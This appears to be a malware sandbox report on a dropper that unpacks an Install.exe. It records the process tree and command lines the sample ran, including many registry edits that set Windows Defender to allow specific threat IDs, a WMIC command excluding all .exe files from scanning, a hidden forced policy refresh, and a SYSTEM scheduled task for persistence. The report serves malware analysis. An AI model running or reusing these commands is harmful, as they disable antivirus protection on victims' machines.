Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1424 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe
PID 1424 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe
PID 1424 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe
PID 4936 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe
PID 4936 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe
PID 4936 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe
PID 4924 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 4924 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 3532 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3560 wrote to memory of 3492 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3560 wrote to memory of 3492 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3560 wrote to memory of 3492 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3492 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3492 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3492 wrote to memory of 2020 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3532 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 4180 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4180 wrote to memory of 1528 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4180 wrote to memory of 1528 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4180 wrote to memory of 1528 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1528 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1528 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1528 wrote to memory of 2532 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3532 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3792 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3792 wrote to memory of 2288 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3792 wrote to memory of 2288 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3792 wrote to memory of 2288 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2288 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2288 wrote to memory of 4432 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3532 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3044 wrote to memory of 308 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 308 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 308 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 308 wrote to memory of 3364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 308 wrote to memory of 3364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 308 wrote to memory of 3364 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 3532 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 3532 wrote to memory of 4552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 4552 wrote to memory of 4700 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 4700 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4552 wrote to memory of 4700 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4700 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4700 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4700 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4496 wrote to memory of 1592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 4496 wrote to memory of 1592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 4496 wrote to memory of 1592 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\gpupdate.exe
PID 4924 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4924 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4924 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 436 wrote to memory of 1316 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 436 wrote to memory of 1316 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 436 wrote to memory of 1316 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1316 wrote to memory of 1288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe

"C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe"

C:\Users\Admin\AppData\Local\Temp\7zS8C71.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe

.\Install.exe /XGAZPdidZSkQ "525403" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bcicWGWSPuqTxjDSpV" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe\" Yw /izididItvs 525403 /S" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bcicWGWSPuqTxjDSpV"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bcicWGWSPuqTxjDSpV

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bcicWGWSPuqTxjDSpV

C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zS8E84.tmp\Install.exe Yw /izididItvs 525403 /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

